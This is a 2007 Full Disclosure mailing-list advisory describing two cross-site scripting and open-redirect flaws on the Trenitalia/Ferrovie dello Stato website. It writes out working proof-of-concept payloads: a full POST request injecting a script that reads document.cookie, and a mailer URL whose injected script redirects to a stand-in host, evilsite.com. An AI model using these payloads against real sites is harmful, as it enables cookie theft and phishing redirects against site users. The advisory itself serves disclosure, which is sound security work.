Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Multiple vulnerabilities in Trenitalia.com website

Multiple vulnerabilities in Trenitalia.com website

From: <davide_at_securityinfos.com>
Date: Mon, 23 Jul 2007 03:45:39 -0400

[-] Overview

Trenitalia.com is the website of the most important railway company in
Italy.
In this website, I've been discovered two vulnerabilities that allow
attacker to
execute arbitrary javascript code via XSS or URL redirect.

[-] Vulnerability Description

In the first vulnerability, it's necessary to sending POST request, adding
in POSTDATA textfield variable arbitrary HTML commands as following:

POST
http://www.ferroviedellostato.it/ferrovie/v/index.jsp?vgnextoid=c813055409b8
c010VgnVCM1001002f2af90aRCRD
Host=www.ferroviedellostato.it
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.1.5)
Gecko/20070713 Firefox/2.0.0.5
Accept= */*
Accept-Language= it
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Connection=keep-alive
Referer=http://www.ferroviedellostato.it/
Cookie=JSESSIONID=0000K_6eq2u2Z8MaLviVwAgmxu1:123p65u0i
Content-Type=application/x-www-form-urlencoded
Content-Length=63
POSTDATA=textfield=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

------ - - - - - - - - -

In the second one, the ffss_mailer.jsp page generates a mail form to send
an invite to friend, but it allows user to add in textfield variable
arbitraty HTML code, creating a malicious mail that contains URL redirect
or XSS attack:

this is an example ( evilsite.com must be replaced with the site to
redirect )

http://www.ferroviedellostato.it/ferrovie/mails/ffss_mailer.jsp?vgnextoid=c8
13055209b8c010VgnVCM1000002f2af90aRCRD&textfield=</span></p>%3Cscript%3Eloca
tion.href='http://evilsite.com'%3C/script%3E',%20\'width=516,height=255,stat
us=yes',%20'width=516,height=255,status=yes

[-] Additional Information

Vulnerability screenshots are available at these URLs:

http://exploit.blogosfere.it/images/trenitaliamail.jpg/screenMail.jpg
http://exploit.blogosfere.it/images/trenitaliaMainPage.jpg/trenitaliaPage.jp
g

[-] Company Notification
 
Trenitalia.com has been notified

[-] Credits
 
The vulnerability was discovered by Davide Denicolo

Davide Denicolo
davide <~@~> securityinfos < . > com
http://exploit.blogosfere.it

--------------------------------------------------------------------
mail2web LIVE – Free email based on Microsoft® Exchange technology -
http://link.mail2web.com/LIVE

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Jul 23 2007

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]